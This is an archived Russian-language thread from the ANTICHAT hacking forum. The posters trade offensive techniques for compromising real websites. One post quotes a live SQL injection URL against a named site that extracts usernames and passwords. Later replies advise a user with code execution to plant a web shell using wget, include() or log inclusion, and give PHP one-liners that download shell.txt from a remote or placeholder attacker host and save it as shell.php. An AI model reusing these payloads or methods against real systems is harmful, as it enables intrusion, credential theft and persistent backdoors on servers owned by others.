ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

15.09.2009, 23:18
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме: 6075534
Репутация:
2731
|
|
Есть уязвимость на одном популярном(!) сервисе (форуме). На оооочень популярном. Каждый античатовец знает его, или был там хотя бы раз. Уязвимость заключается в том, что на форум можно заливать файл на любой(!) пост. Пример: мой ник mailbrush. Ник юзера, скажем hackadmin. hackadmin написал пост бла бла бла, онтоле похекал майкрософт. Я могу к этому посту прилепить свой файл. Стоит ли эта уязвимость отдельной темы в разделе "УЯЗВИМОСТИ" или пока держать это в привате?
|
|
|

16.09.2009, 00:50
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме: 7215020
Репутация:
1423
|
|
Сообщение от mailbrush
Стоит ли эта уязвимость отдельной темы в разделе "УЯЗВИМОСТИ" или пока держать это в привате?
Чего полезного из этого можно извлечь ?
Сообщение от Gemini12
2BlackSun
Не мог бы скинуть ссылочку на список таблиц 4 мускули если не затруднит. Очень надо плз.
http://www.dialog.kz/?lan=ru&id=92&pub=-1+union+select+1,2,3,4,concat_ws(0x2F,username,use rpass),6,7,8,9,10,11,12,13,14+from+users--+
|
|
|

16.09.2009, 07:31
|
|
Banned
Регистрация: 21.07.2009
Сообщений: 20
Провел на форуме: 26854
Репутация:
-11
|
|
Иммется выполнение кода типа file?c=phpinfo();
пождскажите как через это залить шелл?
|
|
|

16.09.2009, 07:40
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме: 5011696
Репутация:
2221
|
|
Сообщение от Explоit
Иммется выполнение кода типа file?c=phpinfo();
пождскажите как через это залить шелл?
wget
|
|
|

16.09.2009, 07:41
|
|
Banned
Регистрация: 21.07.2009
Сообщений: 20
Провел на форуме: 26854
Репутация:
-11
|
|
а если его нету в системе? + вырублена функция system(),exex(),passtru()
|
|
|

16.09.2009, 07:47
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме: 5011696
Репутация:
2221
|
|
Сообщение от Explоit
а если его нету в системе? + вырублена функция system(),exex(),passtru()
include()
ps
9000 пост 
|
|
|

16.09.2009, 07:59
|
|
Banned
Регистрация: 21.07.2009
Сообщений: 20
Провел на форуме: 26854
Репутация:
-11
|
|
Сообщение от Ctacok
include()
ps
9000 пост 
там блин такая булка, что авы выводяться вот типа так
Код:
http://ыыыы/image.php?u=124124&dateline=124124124
+ я думую что они проверяются там на пхп код.
И удалённый инклуд запрещён.а юзать логи както извратно в данном случае..
ЗЫ есть досутуп в админку, но както не получеться там uploder сделать =(
|
|
|

16.09.2009, 08:12
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме: 5011696
Репутация:
2221
|
|
Сообщение от Explоit
там блин такая булка, что авы выводяться вот типа так
Код:
http://ыыыы/image.php?u=124124&dateline=124124124
+ я думую что они проверяются там на пхп код.
И удалённый инклуд запрещён.а юзать логи както извратно в данном случае..
ЗЫ есть досутуп в админку, но както не получеться там uploder сделать =(
Ну удалённый то понятно.
А вот как ты хотел то?
Инклюд логами делай.
|
|
|

16.09.2009, 08:42
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме: 4075418
Репутация:
386
|
|
зделать какуюнибудь качалку на пхп, аля :
Код:
<? $data = implode('',file('http://127.0.0.1/shell.txt')); $fp=fopen('./123.php','wb'); fputs($fp,$data); fclose($fp); ?>
|
|
|

16.09.2009, 09:54
|
|
Участник форума
Регистрация: 27.10.2008
Сообщений: 215
Провел на форуме: 810079
Репутация:
90
|
|
Лей шелл вот так:
Код:
<?php copy("http://hacker.host/shell.txt", "./shell.php"); ?>
либо, если экранируются кавычки:
Код:
<?php copy(stripslashes("http://hacker.host/shell.txt", "./shell.php")); ?>
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|